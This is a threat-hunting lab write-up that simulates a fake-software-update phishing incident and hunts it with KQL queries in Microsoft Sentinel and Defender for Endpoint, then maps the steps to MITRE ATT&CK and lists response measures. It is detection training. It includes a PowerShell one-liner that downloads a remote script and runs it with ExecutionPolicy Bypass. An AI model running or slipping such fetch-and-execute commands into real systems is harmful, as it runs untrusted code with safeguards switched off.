- Organization: 🏢 Medium-sized FinTech company.
- Threat: Employees report unusual system behavior after clicking on a suspicious software update notification.
- Objective: Identify the phishing campaign’s scope, mitigate its impact, and strengthen defenses.
📥 The PowerShell Payload Run the PowerShell command below on your VM after onboarding it to MDE:
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/TrevinoParker7/Powershell-test-payload-harmless/refs/heads/main/phishingFakeSoftwareUpdate.ps1' -OutFile 'C:\programdata\phishingFakeSoftwareUpdate.ps1';cmd /c powershell.exe -ExecutionPolicy Bypass -File C:\programdata\phishingFakeSoftwareUpdate.ps1
- SIEM: Microsoft Sentinel
- Endpoint Protection: Microsoft Defender for Endpoint
- Query Language: Kusto Query Language (KQL)
- Infrastructure: Windows 10 VMs on Microsoft Azure
Focus Areas:
1️⃣ Check DeviceFileEvents for suspicious file activities.
2️⃣ Check DeviceProcessEvents for signs of malicious execution.
3️⃣ Check DeviceNetworkEvents for outgoing connections, especially over known malicious ports.
Query: Recent File Events
DeviceFileEvents
| top 50 by Timestamp descQuery: Network Events
DeviceNetworkEvents
| top 50 by Timestamp descQuery: Process Events
DeviceProcessEvents
| top 50 by Timestamp desc- TTP: T1193 - Spear Phishing Link
- Event: Employees receive a phishing mimicking IT with a link to a "critical software update."
- Impact: The link leads to downloading a PowerShell payload.
Relevant Query:
DeviceFileEvents
| where DeviceName == "tphish"
| where FileName endswith "ps1"
| order by Timestamp desc 
- TTP: T1059.001 - PowerShell Execution
- Event: Malicious PowerShell script execution on victim devices.
- Query Used:
let VMName = "tphish";
let specificTime = datetime(2025-01-26T19:01:29.0367754Z);
DeviceProcessEvents
| where Timestamp between ((specificTime - 2m) .. (specificTime + 2m))
| where DeviceName == VMName
| order by Timestamp desc
DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine contains "phishingFakeSoftwareUpdate.ps1" or ProcessCommandLine contains "Add-Type -AssemblyName PresentationFramework"
| extend Timestamp = Timestamp, InitiatingProcessAccountName = InitiatingProcessAccountName
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessAccountName, InitiatingProcessCommandLine
| order by Timestamp desc
- TTP: T1071.001 - Web Protocols
- Event: Communication with a C2 server over the internet, potentially exfiltrating credentials.
- Query Used:
union DeviceNetworkEvents, DeviceProcessEvents
| where Timestamp > ago(6h)
| where RemoteUrl contains "raw.githubusercontent.com" or InitiatingProcessCommandLine has "phishingFakeSoftwareUpdate.ps1"
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, InitiatingProcessCommandLine, FileName, FolderPath, ActionType
| order by Timestamp desc
- TTPs:
- T1210 - Exploitation of Remote Services
1️⃣ Block the malicious domain on the firewall and DNS servers.
2️⃣ Disable compromised user accounts and enforce password resets.
3️⃣ Isolate infected machines from the network.
1️⃣ Deploy updated antivirus signatures to detect and remove the malware.
2️⃣ Conduct system-wide scans using EDR tools.
1️⃣ Restore affected systems from backups.
2️⃣ Re-enable user access after ensuring systems are clean.
- Enhanced SIEM rules for detecting phishing emails.
- Integration of threat intelligence feeds to block new malicious domains.
- Create a Rule to detect this.
- Mandatory phishing training with simulation tests.
- Quick-reference phishing awareness guide shared via email.
| Tactic | Technique | ID | Example |
|---|---|---|---|
| Initial Access | Spear Phishing Link | T1193 | Phishing email with fake update link |
| Execution | PowerShell Execution | T1059.001 | Malicious PowerShell script executed |
| Command & Control | Web Protocols | T1071.001 | C2 communication to exfiltrate data |
| Credential Access | Credentials in Files | T1555.003 | Stolen credentials from payload use |
| Lateral Movement | Exploitation of Remote Services | T1210 | Attempts to pivot to other devices |
Run the PowerShell command below on your VM after onboarding it to MDE:
---